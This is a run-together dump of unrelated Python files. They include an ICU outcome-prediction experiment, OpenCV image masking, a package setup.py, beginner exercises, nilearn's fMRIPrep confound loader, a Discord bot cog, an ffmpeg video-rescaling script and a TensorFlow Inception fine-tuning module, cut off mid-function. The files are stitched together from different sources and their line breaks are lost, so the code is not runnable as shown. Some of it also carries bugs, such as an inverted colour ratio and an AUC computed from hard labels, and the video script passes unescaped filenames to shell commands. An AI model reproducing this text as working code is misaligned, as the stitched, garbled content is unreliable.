rf_test_metrics = try_rf(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nGradient Boosting Decision tree') xgboost_train_metrics, xgboost_test_metrics = try_dbdt(X_train, X_test, y_train, y_test, scoring) if __name__ == '__main__': path = './logs/individualization_24_1th.txt' f = open(path, 'a+') orig_stdout = sys.stdout sys.stdout = f for time_interval in [24]: # ,48,72,96,120,144]: x, y, z_icustay_id, all_xy = preprocessing(folder, time_interval) # all_xy is for compute gower distance skf = StratifiedKFold(n_splits=5) print '%%%%%' num_fold = 0 for train_index, test_index in skf.split(x, y): print '***************' # print 'This is the '+ str(i)+' times result of '+str(n_fold)+' fold' X_train_0, X_test_0 = x[train_index], x[test_index] y_train_0, y_test_0 = y[train_index], y[test_index] print '#####################' num_fold = num_fold + 1 print 'this is the results of the %d fold in 5 folds:' %num_fold print 'the number of testing samples in this fold:', test_index.size train_z_icustay_id = z_icustay_id[train_index] # the icustay_id of samples in training set from 5 fold test_z_icustay_id = z_icustay_id[test_index] # the icustay_id of samples in testing set from 5 fold xg_one_fold_pred = [] # obtain the pred label of testing samples for one fold using xgboost xg_one_fold_proba = [] # obtain the proba of testing samples for one fold using xgboost lr_one_fold_pred = [] # obtain the pred label of testing samples for one fold using lr lr_one_fold_proba = [] # obtain the proba of testing samples for one fold using lr indicator_time = 0 # the indicator for i, j in zip(test_z_icustay_id, test_index): # i_index = np.where(test_z_icustay_id == i) # tem_test_z_icustay_id = np.delete(test_z_icustay_id, i_index) testing_sample_id = i all_xy_0 = all_xy.loc[train_z_icustay_id] # select training samples from 5 fold all_xy_training = all_xy_0.append(all_xy.loc[i]) # note that , containing the i m = 400 # m is the number of similar cases or similar controls X_test_00 = x[j] y_test = y[j] X_test = X_test_00.reshape(1, -1) # print 'start selecting......' Id_train_set = select_train_samples(testing_sample_id, all_xy_training, m, time_interval) # individulization ix = np.isin(z_icustay_id, Id_train_set) Id_train_set_index = list(np.where(ix)) # Id_train_set_index = np.argwhere(z_icustay_id == Id_train_set) X_train = x[Id_train_set_index] y_train = y[Id_train_set_index] # print 'start training......' # scoring = 'roc_auc' # xgboost xgboost_mod = XGBClassifier(learning_rate=0.1, n_estimators=100, max_depth=5, min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, seed=27) xgboost_mod.fit(X_train, y_train) xg_y_pred = xgboost_mod.predict(X_test) xg_y_pred_proba = xgboost_mod.predict_proba(X_test)[:,1] xg_one_fold_pred.append(xg_y_pred) xg_one_fold_proba.append(xg_y_pred_proba) # lr logreg = LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=10, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None) logreg.fit(X_train, y_train) lr_y_pred = logreg.predict(X_test) lr_y_pred_proba = logreg.predict_proba(X_test)[:,1] lr_one_fold_pred.append(lr_y_pred) lr_one_fold_proba.append(lr_y_pred_proba) indicator_time = indicator_time + 1 # print 'the next testing sample and total samples:', indicator_time, test_index.size xg_y_individual_pred = np.array(xg_one_fold_pred) xg_y_individual_proba = np.array(xg_one_fold_proba) lr_y_individual_pred = np.array(lr_one_fold_pred) lr_y_individual_proba = np.array(lr_one_fold_proba) one_fold_y_test = y[test_index] print 'this is the result of individual predictor using xgboost:' print 'the acc of one fold:', accuracy_score(one_fold_y_test, xg_y_individual_pred) print 'the classification_report :', classification_report(one_fold_y_test, xg_y_individual_pred) print 'the auc of one fold:', roc_auc_score(one_fold_y_test, xg_y_individual_proba) print 'this is the result of individual predictor using lr:' print 'the acc of one fold:', accuracy_score(one_fold_y_test, lr_y_individual_pred) print 'the classification_report :', classification_report(one_fold_y_test, lr_y_individual_pred) print 'the auc of one fold:', roc_auc_score(one_fold_y_test, lr_y_individual_pred) # using non-individual predictor for classification xgboost_random = XGBClassifier(learning_rate=0.1, n_estimators=100, max_depth=5, min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, seed=27) xgboost_random.fit(X_train_0, y_train_0) y_pred_random = xgboost_random.predict(X_test_0) y_proba_random = xgboost_random.predict_proba(X_test_0)[:,1] y_test_random = y[test_index] print 'this is the result of non-individual predictor using xgboost:' print 'the acc is:',accuracy_score(y_test_random, y_pred_random) print 'the classification_report:', classification_report(y_test_random, y_pred_random) print 'the auc is:', roc_auc_score(y_test_random, y_proba_random) logreg_random = LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=10, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None) logreg_random.fit(X_train_0, y_train_0) lr_y_pred_random = logreg_random.predict(X_test_0) lr_y_pred_proba_random = logreg_random.predict_proba(X_test_0)[:, 1] print 'this is the result of non-individual predictor using lr:' print 'the acc is:',accuracy_score(y_test_random, lr_y_pred_random) print 'the classification_report:', classification_report(y_test_random, lr_y_pred_random) print 'the auc is:', roc_auc_score(y_test_random, lr_y_pred_proba_random) # break sys.stdout = orig_stdout f.close() """ Detects the outline of the tree """ import numpy as np import cv2 def outline(image): # convert the image to grayscale, blur it, and find edges # in the image gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) gray = cv2.GaussianBlur(gray, (5, 5), 0) # edged = cv2.Canny(gray, 75, 200) cnt, _, _ = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) return cnt cv2.drawContours(image, cnt, -1, (0, 255, 0), 5) return image def color_ratio(image): color = 0 total = 0 for arr in image: for r in arr: if sum(r): color += 1 total += 1 return total/color # Green ((0, 19, 0), (197, 250, 186)) # Red ((0, 0, 14), (116, 0, 252)) # Gold def apply_mask(image, color_range): lower = np.array(color_range[0], dtype = 'uint8') upper = np.array(color_range[1], dtype = 'uint8') mask = cv2.inRange(image, lower, upper) return cv2.bitwise_and(image, image, mask=mask) def apply_not_mask(image, color_range): lower = np.array(color_range[0], dtype = 'uint8') upper = np.array(color_range[1], dtype = 'uint8') mask = cv2.inRange(image, lower, upper) return cv2.bitwise_not(image, image, mask=mask) def apply_hsv_mask(image, color=255): hsv_img = cv2.cvtColor(image, cv2.COLOR_BGR2HSV) lower = (50, 100, 100) upper = (70, 255, 255) mask = cv2.inRange(hsv_img, lower, upper) hsv_img = cv2.bitwise_and(hsv_img, hsv_img, mask=mask) return cv2.cvtColor(hsv_img, cv2.COLOR_HSV2BGR) def main(image): green = ([25, 15, 15], [250, 100, 75]) red = ([17, 15, 100], [50, 56, 200]) alls = ([0,0,0],[255,255,255]) lower = np.array(alls[0], dtype = "uint8") upper = np.array(alls[1], dtype = "uint8") mask = cv2.inRange(image, lower, upper) output = cv2.bitwise_and(image, image, mask = mask) return output paulross/pymemtrace10-100 # -*- coding: utf-8 -*- """Top-level package for pymemtrace.""" __author__ = """""" __email__ = '' __version__ = '0.1.1' from setuptools import setup, Distribution, find_packages class BinaryDistribution(Distribution): def has_ext_modules(cacho): return True with open("README.md", "r") as fh: long_description = fh.read() # setup( # name='cacho', # version='0.0.6', # author="Sanix-darker", # author_email="", # description="A tiny C++ in-memory cache system with Least recently Used algorithm!", # long_description=long_description, # long_description_content_type="text/markdown", # url="https://github.com/osscameroon/cacho", # packages=find_packages(), # package_data={ # 'cacho': ['./build/lib/cacho.so'], # }, # distclass=BinaryDistribution, # classifiers=[ # "Programming Language :: Python :: 3", # "License :: OSI Approved :: MIT License", # "Operating System :: OS Independent", # ], # python_requires='>=3.6', # ) setup( name='cacho', package_data={ 'cacho': ['./build/lib/cacho.so'], }, distclass=BinaryDistribution, version='0.0.7', author="Sanix-darker", author_email="", description="A tiny C++ in-memory cache system with Least recently Used algorithm!", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/osscameroon/cacho", classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], python_requires='>=3.5', )""" IS PALINDROME: Write a Python function that checks whether a passed in string is palindrome or not. Note: A palindrome is word, phrase, or sequence that reads the same backward as forward, e.g., madam or nurses run. """ s = input("Enter a sequence to check, if it's a palindrome.") char_group = [" ", "!", "?", ".", ","] s_new=s for symbol in char_group: s_new = s_new.replace("{}".format(symbol), "") if s_new.lower() == s_new[::-1].lower(): print("It's a palindrome!") print(s_new.lower()) else: print("It's not a palindrome!") if len(s_new) % 2 == 0: upper_range = len(s_new)//2 else: upper_range = len(s_new)//2 +1 for number in range(0, upper_range): if s_new.lower()[number] != s_new.lower()[-(number + 1)]: print(s_new.lower()) print("Difference between " + s_new.lower()[number] + " and " + s_new.lower()[-(number + 1)]) else: continue """Flexible method to load confounds generated by fMRIprep. Authors: , , , , , , . """ import warnings import pandas as pd from .load_confounds_utils import (_sanitize_confounds, _confounds_to_df, _prepare_output, MissingConfound) from . import load_confounds_components as components # Global variables listing the admissible types of noise components all_confounds = [ "motion", "high_pass", "wm_csf", "global_signal", "compcor", "ica_aroma", "scrub", "non_steady_state" ] # extra parameters needed for each noise component component_parameters = { "motion": ["motion"], "wm_csf": ["wm_csf"], "global_signal": ["global_signal"], "compcor": ["meta_json", "compcor", "n_compcor"], "ica_aroma": ["ica_aroma"], "scrub": ["scrub", "fd_threshold", "std_dvars_threshold"], } def _check_strategy(strategy): """Ensure the denoising strategies are valid.""" if (not isinstance(strategy, tuple)) and (not isinstance(strategy, list)): raise ValueError("strategy needs to be a tuple or list of strings" f" A {type(strategy)} was provided instead.") for conf in strategy: if conf == "non_steady_state": warnings.warn("Non-steady state volumes are always detected. It " "doesn't need to be supplied as part of the " "strategy. Supplying non_steady_state in strategy " "will not have additional effect.") if conf not in all_confounds: raise ValueError(f"{conf} is not a supported type of confounds.") # high pass filtering must be present if using fmriprep compcor outputs if ("compcor" in strategy) and ("high_pass" not in strategy): raise ValueError("When using compcor, `high_pass` must be included in " f"strategy. Current strategy: '{strategy}'") def _check_error(missing): """Consolidate a single error message across multiple missing confounds.""" if missing["confounds"] or missing["keywords"]: error_msg = ( "The following keywords or parameters are missing: " + f" {missing['confounds']}" + f" {missing['keywords']}" + ". You may want to try a different denoising strategy." ) raise ValueError(error_msg) def load_confounds(img_files, strategy=("motion", "high_pass", "wm_csf"), motion="full", scrub=5, fd_threshold=0.2, std_dvars_threshold=3, wm_csf="basic", global_signal="basic", compcor="anat_combined", n_compcor="all", ica_aroma="full", demean=True): """ Use confounds from :term:`fMRIPrep`. To enable easy confound variables loading from :term:`fMRIPrep` outputs, `load_confounds` provides an interface that groups subsets of confound variables into noise components and their parameters. It is possible to fine-tune a subset of noise components and their parameters through this function. The implementation will only support :term:`fMRIPrep` functional derivative directory from the 1.2.x series. The `compcor` noise component requires 1.4.x series or above. .. versionadded:: 0.8.2 Parameters ---------- img_files : path to processed image files, optionally as a list. Processed nii.gz/dtseries.nii/func.gii file reside in a :term:`fMRIPrep` generated functional derivative directory (i.e.The associated confound files should be in the same directory as the image file). As long as the image file, confound related tsv and json are in the same directory with BIDS-complied names, `load_confounds` can retrieve the relevant files correctly. - `nii.gz` or `dtseries.nii`: path to files, optionally as a list. - `func.gii`: list of a pair of paths to files, optionally as a list of lists. strategy : tuple or list of strings. Default ("motion", "high_pass", "wm_csf") The type of noise components to include. - "motion": head motion estimates. Associated parameter: `motion` - "wm_csf" confounds derived from white matter and cerebrospinal fluid. Associated parameter: `wm_csf` - "global_signal" confounds derived from the global signal. Associated parameter: `global_signal` - "compcor" confounds derived from CompCor :footcite:`BEHZADI200790`. When using this noise component, "high_pass" must also be applied. Associated parameter: `compcor`, `n_compcor` - "ica_aroma" confounds derived from ICA-AROMA :footcite:`Pruim2015`. Associated parameter: `ica_aroma` - "scrub" regressors for :footcite:`Power2014` scrubbing approach. Associated parameter: `scrub`, `fd_threshold`, `std_dvars_threshold` For each component above, associated parameters will be applied if specified. If associated parameters are not specified, any values supplied to the parameters are ignored. For example, `strategy=('motion', 'global_signal')` will allow users to supply input to associated parameter `motion` and `global_signal`; if users pass `wm_csf` parameter, it will not be applied as it is not part of the `strategy`. There are two additional noise components with no optional parameters. - "non_steady_state" denotes volumes collected before the :term:`fMRI` scanner has reached a stable state. - "high_pass" adds discrete cosines transformation basis regressors to handle low-frequency signal drifts. Non-steady-state volumes will always be checked. There's no need to supply this component to the strategy. motion : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from head motion estimates. - "basic" translation/rotation (6 parameters) - "power2" translation/rotation + quadratic terms (12 parameters) - "derivatives" translation/rotation + derivatives (12 parameters) - "full" translation/rotation + derivatives + quadratic terms + power2d derivatives (24 parameters) wm_csf : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from masks of white matter and cerebrospinal fluids. - "basic" the averages in each mask (2 parameters) - "power2" averages and quadratic terms (4 parameters) - "derivatives" averages and derivatives (4 parameters) - "full" averages + derivatives + quadratic terms + power2d derivatives (8 parameters) global_signal : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from the global signal. - "basic" just the global signal (1 parameter) - "power2" global signal and quadratic term (2 parameters) - "derivatives" global signal and derivative (2 parameters) - "full" global signal + derivatives + quadratic terms + power2d derivatives (4 parameters) scrub : int, default 5 After accounting for time frames with excessive motion, further remove segments shorter than the given number. The default value is 5 (referred as full scrubbing in :footcite:`Power2014`). When the value is 0, temove time frames based on excessive framewise displacement and DVARS only. One-hot encoding vectors are added as regressors for each scrubbed frame. fd_threshold : float, default 0.2 Framewise displacement threshold for scrub (default = 0.2 mm) std_dvars_threshold : float, default 3 Standardized DVARS threshold for scrub (default = 3). DVARs is defined as root mean squared intensity difference of volume N to volume N+1 :footcite:`Power2012`. D referring to temporal derivative of timecourses, VARS referring to root mean squared variance over voxels. compcor : {'anat_combined', 'anat_separated', 'temporal',\ 'temporal_anat_combined', 'temporal_anat_separated'} .. warning:: Require fmriprep >= v:1.4.0. Type of confounds extracted from a component based noise correction method :footcite:`BEHZADI200790`. - "anat_combined" noise components calculated using a white matter and CSF combined anatomical mask - "anat_separated" noise components calculated using white matter mask and CSF mask compcor separately; two sets of scores are concatenated - "temporal" noise components calculated using temporal compcor - "temporal_anat_combined" components of "temporal" and "anat_combined" - "temporal_anat_separated" components of "temporal" and "anat_separated" n_compcor : "all" or int, default "all" The number of noise components to be extracted. For acompcor_combined=False, and/or compcor="full", this is the number of components per mask. "all": select all components (50% variance explained by :term:`fMRIPrep` defaults) ica_aroma : {'full', 'basic'} - "full": use :term:`fMRIPrep` output `~desc-smoothAROMAnonaggr_bold.nii.gz`. - "basic": use noise independent components only. demean : boolean, default True If True, the confounds are standardized to a zero mean (over time). When using :class:`nilearn.input_data.NiftiMasker` with default parameters, the recommended option is True. When using :func:`nilearn.signal.clean` with default parameters, the recommended option is False. When `sample_mask` is not None, the mean is calculated on retained volumes. Returns ------- confounds : pandas.DataFrame, or list of A reduced version of :term:`fMRIPrep` confounds based on selected strategy and flags. An intercept is automatically added to the list of confounds. The columns contains the labels of the regressors. sample_mask : None, numpy.ndarray, or list of When no volumns require removal, the value is None. Otherwise, shape: (number of scans - number of volumes removed, ) The index of the niimgs along time/fourth dimension for valid volumes for subsequent analysis. This attribute should be passed to parameter `sample_mask` of :class:`nilearn.input_data.NiftiMasker` or :func:`nilearn.signal.clean`. Volumns are removed if flagged as following: - Non-steady-state volumes (if present) - Motion outliers detected by scrubbing Notes ----- The noise components implemented in this class are adapted from :footcite:`Ciric2017`. Band-pass filter is replaced by high-pass filter. Low-pass filters can be implemented, e.g., through `NifitMaskers`. Other aspects of the preprocessing listed in :footcite:`Ciric2017` are controlled through :term:`fMRIPrep`, e.g. distortion correction. See Also -------- :func:`nilearn.interfaces.fmriprep.load_confounds_strategy` References ----------- .. footbibliography:: """ _check_strategy(strategy) # load confounds per image provided img_files, flag_single = _sanitize_confounds(img_files) confounds_out = [] sample_mask_out = [] for file in img_files: sample_mask, conf = _load_single( file, strategy, demean, motion=motion, scrub=scrub, fd_threshold=fd_threshold, std_dvars_threshold=std_dvars_threshold, wm_csf=wm_csf, global_signal=global_signal, compcor=compcor, n_compcor=n_compcor, ica_aroma=ica_aroma) confounds_out.append(conf) sample_mask_out.append(sample_mask) # If a single input was provided, # send back a single output instead of a list if flag_single: confounds_out = confounds_out[0] sample_mask_out = sample_mask_out[0] return confounds_out, sample_mask_out def _load_single(confounds_raw, strategy, demean, **kargs): """Load confounds for a single image file.""" # Convert tsv file to pandas dataframe # check if relevant imaging files are present according to the strategy flag_acompcor = ("compcor" in strategy) and ( "anat" in kargs.get("compcor") ) flag_full_aroma = ("ica_aroma" in strategy) and ( kargs.get("ica_aroma") == "full" ) confounds_raw, meta_json = _confounds_to_df( confounds_raw, flag_acompcor, flag_full_aroma ) missing = {"confounds": [], "keywords": []} # always check non steady state volumes are loaded confounds, missing = _load_noise_component(confounds_raw, "non_steady_state", missing, meta_json=meta_json, **kargs) for component in strategy: loaded_confounds, missing = _load_noise_component( confounds_raw, component, missing, meta_json=meta_json, **kargs) confounds = pd.concat([confounds, loaded_confounds], axis=1) _check_error(missing) # raise any missing return _prepare_output(confounds, demean) def _load_noise_component(confounds_raw, component, missing, **kargs): """Load confound of a single noise component.""" try: need_params = component_parameters.get(component) if need_params: params = {param: kargs.get(param) for param in need_params} loaded_confounds = getattr(components, f"_load_{component}")( confounds_raw, **params) else: loaded_confounds = getattr(components, f"_load_{component}")( confounds_raw) except MissingConfound as exception: missing["confounds"] += exception.params missing["keywords"] += exception.keywords loaded_confounds = pd.DataFrame() return loaded_confounds, missing snow-blade/Botoneto0 import time import discord import psutil import os from datetime import datetime from discord.ext import commands from utils import default class Information(commands.Cog): def __init__(self, bot): self.bot = bot self.config = default.get("config.json") self.process = psutil.Process(os.getpid()) @commands.command() async def me(self, ctx): """Get info about your pitiful self in a dm""" if ctx.invoked_subcommand is None: findbots = sum(1 for member in ctx.guild.members if member.bot) embed = discord.Embed() if ctx.guild.icon: embed.set_thumbnail(url=ctx.guild.icon_url) if ctx.guild.banner: embed.set_image(url=ctx.guild.banner_url_as(format="png")) embed.add_field(name="Server Name", value=ctx.guild.name, inline=True) embed.add_field(name="Server ID", value=ctx.guild.id, inline=True) embed.add_field(name="Members", value=ctx.guild.member_count, inline=True) embed.add_field(name="Bots", value=findbots, inline=True) embed.add_field(name="Owner", value=ctx.guild.owner, inline=True) embed.add_field(name="Region", value=ctx.guild.region, inline=True) embed.add_field(name="Created", value=default.date(ctx.guild.created_at), inline=True) user=ctx.author if not user: return await ctx.send(f"Could not find any UserID matching **{user_id}**") try: await user.send(content="Server info",embed=embed) await ctx.send(f"✉️ Sent a DM to **{user.name}**") except discord.Forbidden: await ctx.send("This user might be having DMs blocked or it's a bot account...") @commands.command() async def ping(self, ctx): """ Pong! """ before = time.monotonic() before_ws = int(round(self.bot.latency * 1000, 1)) message = await ctx.send("🏓 Pong") ping = (time.monotonic() - before) * 1000 await message.edit(content=f"🏓 WS: {before_ws}ms | REST: {int(ping)}ms") @commands.command(aliases=['joinme', 'join', 'botinvite']) async def invite(self, ctx): """ Invite me to your server """ await ctx.send(f"**{ctx.author.name}**, use this URL to invite me\n<{discord.utils.oauth_url(self.bot.user.id)}>") @commands.command() async def source(self, ctx): """ Most of the code used here was from these tutorials so i have to give credits to the author """ """ Check out my source code <3 """ # Do not remove this command, this has to stay due to the GitHub LICENSE. # TL:DR, you have to disclose source according to MIT. # Reference: https://github.com/AlexFlipnote/discord_bot.py/blob/master/LICENSE await ctx.send(f"**{ctx.bot.user}** is powered by this source code:\nhttps://github.com/AlexFlipnote/discord_bot.py With modifications by user: snow-blade") @commands.command(aliases=['info', 'stats', 'status']) async def about(self, ctx): """ About the bot """ ramUsage = self.process.memory_full_info().rss / 1024**2 avgmembers = round(len(self.bot.users) / len(self.bot.guilds)) embedColour = discord.Embed.Empty if hasattr(ctx, 'guild') and ctx.guild is not None: embedColour = ctx.me.top_role.colour embed = discord.Embed(colour=embedColour) embed.set_thumbnail(url=ctx.bot.user.avatar_url) embed.add_field(name="Last boot", value=default.timeago(datetime.now() - self.bot.uptime), inline=True) embed.add_field( name=f"Developer", value=', '.join([str(self.bot.get_user(x)) for x in self.config.contributors]), inline=True) embed.add_field(name="Library", value="discord.py", inline=True) embed.add_field(name="Servers", value=f"{len(ctx.bot.guilds)} ( avg: {avgmembers} users/server )", inline=True) embed.add_field(name="Commands loaded", value=len([x.name for x in self.bot.commands]), inline=True) embed.add_field(name="RAM", value=f"{ramUsage:.2f} MB", inline=True) await ctx.send(content=f"ℹ About **Botoneto** , **{self.config.version}**", embed=embed) def setup(bot): bot.add_cog(Information(bot)) # In python we don't need to use variable declaration key words, we just go ahead and declare the variable first_name = input('Please enter your first name. ') last_name = input('Please enter your last name. ') middle_initial = input('Please enter your middle initial. ') # Prompt user for user's contact information... address = input('Please enter your address. ') email = input('Please enter your email. ') phone_number = input('Please enter your phone_number. ') # Print a separator. This wasn't part of the assignment, so it's okay if you # don't have this part. :) print('-' * 18) # Print everything to the console... print('Your first name is {0}'.format(first_name)) print('Your last name is {0}'.format(last_name)) print('Your middle initial is {0}'.format(middle_initial)) print('Your address is {0}'.format(address)) print('Your email is {0}'.format(email)) print('Your phone number is {0}'.format(phone_number)) # Print a separator. print('-' * 18) # Prompt for confirmation, and save what user entered. confirmation = input('Is this i\formation correct? (Y/n) ')Cyclip/pydb class UnknownCommand(Exception): pass class BadFormat(Exception): passimport argparse import os import subprocess import time import sys import ipdb import pickle from utils.meter import * def main(args): # Parameters from the args dir, h, w, fps, suffix = args.dir, args.height, args.width, args.fps, args.suffix # Video dir dir_split = dir.split('/') video_dir = dir_split[-1] root_dir = '/'.join(dir_split[:-1]) new_video_dir = "{}_{}x{}_{}".format(video_dir, w, h, fps) new_dir = os.path.join(root_dir, new_video_dir) os.makedirs(new_dir, exist_ok=True) # load the existing dict if exist dict_video_length_fn = os.path.join(new_dir, 'dict_id_length.pickle') if os.path.isfile(dict_video_length_fn): with open(dict_video_length_fn, 'rb') as file: dict_video_length = pickle.load(file) else: dict_video_length = {} # Get the initial video filenames list_video_fn = get_all_videos(dir, suffix) print("\n### Initial directory: {} ###".format(dir)) print("=> {} videos in total\n".format(len(list_video_fn))) # Loop over the super_video and extract op_time = AverageMeter() start = time.time() list_error_fn = [] for i, video_fn in enumerate(list_video_fn): try: # Rescale rescale_video(video_fn, w, h, fps, dir, new_dir, suffix, dict_video_length, ffmpeg=args.ffmpeg, crf=args.crf) # Log duration = time.time() - start op_time.update(duration, 1) time_done = get_time_to_print(op_time.avg * (i + 1)) time_remaining = get_time_to_print(op_time.avg * len(list_video_fn)) print('[{0}/{1}] : Time {batch_time.val:.3f} ({batch_time.avg:.3f}) [{done} => {remaining}]\t'.format( i + 1, len(list_video_fn), batch_time=op_time, done=time_done, remaining=time_remaining)) sys.stdout.flush() start = time.time() except: print("Impossible to rescale_videos super_video for {}".format(video_fn)) list_error_fn.append(video_fn) print("\nDone!") print("\nImpossible to rescale {} videos: \n {}".format(len(list_error_fn), list_error_fn)) # Save the dict id -> length with open(dict_video_length_fn, 'wb') as file: pickle.dump(dict_video_length, file, protocol=pickle.HIGHEST_PROTOCOL) print("\nLength of each video stored ---> {}".format(dict_video_length_fn)) # Print print("\n### You can now have access to your videos rescaled => {} ###\n".format(new_dir)) def get_duration(file): """Get the duration of a super_video using ffprobe. -> https://stackoverflow.com/questions/31024968/using-ffmpeg-to-obtain-super_video-durations-in-python""" cmd = 'ffprobe -i {} -show_entries format=duration -v quiet -of csv="p=0"'.format(file) output = subprocess.check_output( cmd, shell=True, # Let this run in the shell stderr=subprocess.STDOUT ) return float(output) def rescale_video(video_fn, w, h, fps, dir, new_dir, suffix, dict_video_length, ffmpeg, crf=17): """ Rescale a video according to its new width, height an fps """ # Output video_name video_id = video_fn.replace(dir, '').replace(suffix, '') video_fn_rescaled = video_fn.replace(dir, new_dir) video_fn_rescaled = video_fn_rescaled.replace(suffix, suffix.lower()) # Create the dir video_dir_to_create = '/'.join(video_fn_rescaled.split('/')[:-1]) os.makedirs(video_dir_to_create, exist_ok=True) # Check if the file already exists if os.path.isfile(video_fn_rescaled): print("{} already exists".format(video_fn_rescaled)) else: subprocess.call( '{ffmpeg} -i {video_input} -vf scale={w}:{h} -crf {crf} -r {fps} -y {video_output} -loglevel panic'.format( ffmpeg=ffmpeg, video_input=video_fn, h=h, w=w, fps=fps, video_output=video_fn_rescaled, crf=crf ), shell=True) # Get the duration of the new super_video (in sec) duration_sec = get_duration(video_fn_rescaled) duration_frames = int(duration_sec * fps) # update the dict id -> length dict_video_length[video_id] = duration_frames return video_fn_rescaled def get_all_videos(dir, extension='mp4'): """ Return a list of the videos filename from a directory and its subdirectories """ list_video_fn = [] for dirpath, dirnames, filenames in os.walk(dir): for filename in [f for f in filenames if f.endswith(extension)]: # Make sure it is not a hidden file if filename[0] != '.': fn = os.path.join(dirpath, filename) list_video_fn.append(fn) return list_video_fn if __name__ == '__main__': parser = argparse.ArgumentParser(description='Dataset preprocessing') parser.add_argument('--dir', metavar='DIR', default='../data/vlog/videos', help='Path to the videos dir') parser.add_argument('--width', default=256, type=int, metavar='W', help='Width of of the output videos') parser.add_argument('--height', default=256, type=int, metavar='H', help='Height of the output videos') parser.add_argument('--fps', default=30, type=int, metavar='FPS', help='Frames per second of the output video') parser.add_argument('--suffix', metavar='E', default='.mp4', help='Suffix of all the videos files - default version for the VLOG dataset') parser.add_argument('--crf', default=17, type=int, metavar='CRF', help='Quality of the compressing - lower is better (default: 17)') parser.add_argument('--ffmpeg', metavar='FF', default='ffmpeg', help='Path to your ffmpeg to use (default: ffmpeg)') args = parser.parse_args() main(args) henriquelino/pyrelay10-100 class ReskinPacket: def __init__(self): self.type = "RESKIN" self.skinID = 0 def write(self, writer): writer.writeInt32(self.skinID) def read(self, reader): self.skinID = reader.readerInt32() deepsentiment/deepsentiment """ Fine-tune a pre-trained Inception model by chopping off the last logits layer. """ import os import sys import numpy as np import tensorflow as tf from tensorflow.contrib import slim from tensorflow.contrib.slim.python.slim.learning import train_step from sklearn.linear_model import LogisticRegression from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import accuracy_score from slim.preprocessing import inception_preprocessing #from slim.nets import inception from image_model import inception_v1 from datasets import dataset_utils from datasets.convert_to_dataset import get_split, get_split_with_text from datasets.convert_images_tfrecords import get_numpy_data # Seed for reproducibility _RANDOM_SEED = 0 _CONFIG = {'mode': 'train', 'dataset_dir': 'data', 'initial_lr': 1e-3, 'decay_factor': 0.3, 'batch_size': 64, 'final_endpoint': 'Mixed_5c'} def download_pretrained_model(url, checkpoint_dir): """Download pretrained inception model and store it in checkpoint_dir. Parameters: url: The url containing the compressed model. checkpoint_dir: The directory to save the model. """ if not tf.gfile.Exists(checkpoint_dir): tf.gfile.MakeDirs(checkpoint_dir) dataset_utils.download_and_uncompress_tarball(url, checkpoint_dir) def _load_batch(dataset, batch_size=32, shuffle=True, height=299, width=299, is_training=False): """Load a single batch of data. Args: dataset: The dataset to load. batch_size: The number of images in the batch. shuffle: Whether to shuffle the data sources and common queue when reading. height: The size of each image after preprocessing. width: The size of each image after preprocessing. is_training: Whether or not we're currently training or evaluating. Returns: images: A Tensor of size [batch_size, height, width, 3], image samples that have been preprocessed. images_raw: A Tensor of size [batch_size, height, width, 3], image samples that can be used for visualization. labels: A Tensor of size [batch_size], whose values range between 0 and dataset.num_classes. """ # For validation, if you set the common_queue_capacity to something lower than # batch_size, which is the validation size, then your output will contain duplicates. data_provider = slim.dataset_data_provider.DatasetDataProvider( dataset, shuffle=shuffle, common_queue_capacity=batch_size, common_queue_min=8) image_raw, label = data_provider.get(['image', 'label']) # Preprocess image for usage by Inception. image = inception_preprocessing.preprocess_image(image_raw, height, width, is_training=is_training) # Preprocess the image for display purposes. image_raw = tf.expand_dims(image_raw, 0) image_raw = tf.image.resize_images(image_raw, [height, width]) image_raw = tf.squeeze(image_raw) # Batch it up. images, images_raw, labels = tf.train.batch( [image, image_raw, label], batch_size=batch_size, num_threads=1, capacity=2 * batch_size) return images, images_raw, labels def load_batch_with_text(dataset, batch_size=32, shuffle=True, height=299, width=299, is_training=False): """Load a single batch of data. Args: dataset: The dataset to load. batch_size: The number of images in the batch. shuffle: Whether to shuffle the data sources and common queue when reading. height: The size of each image after preprocessing. width: The size of each image after preprocessing. is_training: Whether or not we're currently training or evaluating. Returns: images: A Tensor of size [batch_size, height, width, 3], image samples that have been preprocessed. images_raw: A Tensor of size [batch_size, height, width, 3], image samples that can be used for visualization. labels: A Tensor of size [batch_size], whose values range between 0 and dataset.num_classes. """ # For validation, if you set the common_queue_capacity to something lower than # batch_size, which is the validation size, then your output will contain duplicates. data_provider = slim.dataset_data_provider.DatasetDataProvider( dataset, shuffle=shuffle, common_queue_capacity=batch_size, common_queue_min=8) image_raw, text, seq_len, label, post_id, day = data_provider.get(['image', 'text', 'seq_len', 'label', 'post_id', 'day']) # Preprocess image for usage by Inception. image = inception_preprocessing.preprocess_image(image_raw, height, width, is_training=is_training) # Preprocess the image for display purposes. image_raw = tf.expand_dims(image_raw, 0) image_raw = tf.image.resize_images(image_raw, [height, width]) image_raw = tf.squeeze(image_raw) # Batch it up. images, images_raw, texts, seq_lens, labels, post_ids, days = tf.train.batch( [image, image_raw, text, seq_len, label, post_id, day], batch_size=batch_size, num_threads=1, capacity=2 * batch_size) return images, images_raw, texts, seq_lens, labels, post_ids, days def get_init_fn(checkpoints_dir, model_name='inception_v1.ckpt'): """Returns a function run by the chief worker to warm-start the training. """ checkpoint_exclude_scopes=["InceptionV1/Logits", "InceptionV1/AuxLogits"] exclusions = [scope.strip() for scope in checkpoint_exclude_scopes] variables_to_restore = [] for var in slim.get_model_variables(): excluded = False for exclusion in exclusions: if var.op.name.startswith(exclusion): excluded = True break if not excluded: variables_to_restore.append(var) return slim.assign_from_checkpoint_fn( 